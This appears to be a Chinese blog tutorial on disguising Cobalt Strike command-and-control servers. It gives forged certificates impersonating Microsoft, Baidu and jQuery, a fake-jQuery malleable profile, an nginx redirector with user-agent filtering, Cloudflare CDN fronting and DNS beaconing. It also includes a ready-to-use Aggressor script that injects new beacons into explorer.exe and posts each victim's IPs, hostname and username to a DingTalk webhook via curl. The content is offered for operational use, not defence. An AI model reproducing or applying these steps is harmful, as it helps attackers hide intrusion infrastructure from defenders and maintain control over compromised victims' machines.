首页 笔记

1 Cobaltstrike去除特征

测试版本:

CobaltStrike 4.1

openjdk version "11.0.11"

1.1 修改默认端口&&禁ping

1.直接编辑teamserver文件进行修改

# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=55555 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -classpath ./cobaltstrike.jar server.TeamServer $*

2.禁ping,修改/etc/sysctl.conf

net.ipv4.icmp_echo_ignore_all = 1

然后使用命令sysctl -p使配置生效

1.2 修改默认证书

下面这步可以在HTTPS证书中配置
删除原来的cobaltstrike.store文件,创建新证书:

//taobao
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=taobao.com, O=Sofaware, L=Beijing, ST=Cyberspace, C=CN"

//360
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias 360.com -dname "CN=US, OU=360.com, O=Sofaware, L=Beijing, ST=Cyberspace, C=CN"


//baidu
keytool -keystore cobaltStrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu.com -dname "CN=ZhongGuo, OU=CC, O=CCSEC, L=BeiJing, ST=ChaoYang, C=CN"

//microsoft.com
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias microsoft.com -dname "CN=Microsoft Windows, OU=MOPR, O=MicrosoftCorporation, L=Redmond, ST=Washington, C=US"

//jquery.com
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias jquery.com -dname "CN=Sectigo RSA Domain Validation Secure Server CA, OU=Sectigo Limited, O=jQuery, L=Los Angeles, ST=California, C=US"

导入证书

keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12

查看证书情况

keytool -list -v -keystore cobaltstrike.store

1.3 使用Malleable-C2-Profiles 配置文件

可参考下列链接

https://github.com/xx0hcd/Malleable-C2-Profiles/tree/master/normal
https://github.com/threatexpress/malleable-c2

这里使用伪造jQuery的C2-Profile,查看配置是否可用:

./c2lint malleable-c2/jquery-c2.4.0.profile

启动配置命令:

./teamserver 服务器ip cs密码 混淆配置文件
// 例:
./teamserver 123.4.5.67 123456 ./jquery-c2.4.0.profile

1.4 配置Nginx反向代理

配合Malleable-C2-Profiles 配置文件jquery-c2.4.0.profile

1.4.1 jquery-c2.4.0.profile配置

修改下面信息,如果没有就自行添加

http-config {
    # 仅添加下面这行,用于反向代理获取源ip,即cs中external的IP
    set trust_x_forwarded_for "true";
}
# 再修改下面,useragent可自行修改,有的全改,需要与profile一致
set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";

注:如果需要配置CDN,则需要修改jquery-c2.4.0.profile中的header为如下所示,不然可能会出现不能上线或者无法回显命令的情况

header "Content-Type" "application/*; charset=utf-8";

1.4.2 Nginx配置

修改nginx配置文件/etc/nginx/nginx.conf可用which nginx查位置,修改http下的server如下所示,没有就自己添加:

    # 禁止ip访问
    server {
        listen 80;
        # 自行修改$Your_IP
        server_name $Your_IP;
        return 404;
    }

    server {
        listen 80;
        # 自行修改$Your_Domain
        server_name $Your_Domain;
        location ~*/jquery {
            # UA与profile一致即可
            if ($http_user_agent != "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko") {
                # 自行修改重定向URL
                return 302 https://www.google.com;
            }
            # 获取源IP,即cs中external的IP
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            # 自行修改下面反代端口
            proxy_pass http://127.0.0.1:6666;
        }

        # 下面配置直接跳google
        location / {
            return 302 https://www.google.com;
        }
    } 

热启动,重载配置:nginx -s reload

1.4.3 设置iptables

# 列出规则
#iptables -nL --line-number
# 根据number删除规则
#iptables -D INPUT number

# 允许本地访问6666端口
iptables -A INPUT -s 127.0.0.1 -p tcp --dport 6666 -j ACCEPT
# DROP外部访问
iptables -A INPUT -p tcp --dport 6666 -j DROP

service iptables restart

1.4.4 配置CDN

cloudflare.com添加加个A记录,然后获得两个nameservers地址,然后在域名管理添加这两个为ns记录就行。

SSL/TSL里关闭自动https重写、关闭始终使用https、关闭broti压缩

然后需要在cloudflare中配置规则来永久禁用缓存

76596-ue1wn5dmnfq.png

1.4.7 最后效果

HTTP Port(C2)为nginx监听端口,HTTP Port(Bind)为反代的6666端口

注意配置Cloudflare的CDN后http的监听端口只能设置成以下几个:

80、8080、8880、2052、2082、2086、2095

https的监听端口只能设置成以下几个:

443、2053、2083、2087、2096、8443

53906-vr5dum5i72.png

96610-0x291qbhbzj.png

2. 上线提醒机器人

项目地址:https://github.com/evi1ox/cobalt_strike_bot
下面代码包含了自动注入桌面进程,listener需要与创建的监听器名字一样,下述代码保存为dingtalk.cna

on beacon_initial {
sub callback{
    $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
    $listener = "CDN";
    if ($2 ismatch $regex)
    {
        $pid = matched()[1];
        $inject_pid = $pid;
        if (-is64 $1)
        {
            $arch = "x64";
        }
        else
        {
            $arch = "x86";
        }
        binject($1, $pid, $listener, $arch);
    }
}
if($inject_pid != beacon_info($1,"pid"))
{
    bps($1, &callback);
}

$dt_token = "xxxxxxx替换这里";
$dt_bot_webhookURL = 'https://oapi.dingtalk.com/robot/send?access_token='.$dt_token;
$targetInfo_txt = "## 您有新主机上线啦!\n>";
$listener_txt = "**所属项目:**";
$externalIp_txt = "  \n  >**公网IP:**";
$internalIp_txt = "  \n  >**内网IP:**";
$computerName_txt = "  \n  >**主机名:**";
$userName_txt = "  \n  >**当前用户:**";

local('$internalIP $computerName $userName');
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$externalIP = replace(beacon_info($1, "external"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$listennerName = replace(beacon_info($1, "listener"), " ", "_");
$dt_msg = "{\"msgtype\": \"markdown\",\"markdown\": {\"title\":\"新主机上线\",\"text\":"."\"".$targetInfo_txt.$listener_txt.$listennerName.$externalIp_txt.$externalIP.$internalIp_txt.$internalIP.$computerName_txt.$computerName.$userName_txt.$userName."\""."}}";
@curl_command = @('curl', '-H', 'Content-Type: application/json', '-d', $dt_msg, $dt_bot_webhookURL);
exec(@curl_command);
}

然后再服务器运行cna脚本

./agscript [host] [port] [user] [password] <cna脚本路径>

//如:
./agscript 123.4.5.67 55555 dingtalk 123456 dingtank.cna

若出现报错:

Exception in thread "TeamQueue Reader" java.awt.AWTError: Assistive Technology not found: org.GNOME.Accessibility.AtkWrapper

修复:

sudo sed -i "s/^assistive_technologies=/#&/" \
/etc/java-8-openjdk/accessibility.properties

3. DNS上线配置

cf上添加ns记录,名称服务器填写cs配置的那个域名,就是A记录的那个域名

14212-swt9x43siwp.png

添加两条

09670-0atlfip7d6as.png

监听器配置,Stager随便从上面DNS Hosts中选一个就行了:

40713-yft6xf7tboq.png

配置好后解析如下:

76668-s5rog356l3.png

正常流畅上线即可:

34837-tk4984c4mln.png

踩坑:

端口被占用,关闭命令

systemctl stop systemd-resolved

4. 参考

CS上线之DNS隧道踩坑记 - FreeBuf网络安全行业门户
【渗透测试】CS DNS上线(DoH隧道+CS特征隐藏)

CobaltStrike特征隐藏
Cobalt Strike特征隐藏



文章评论

目录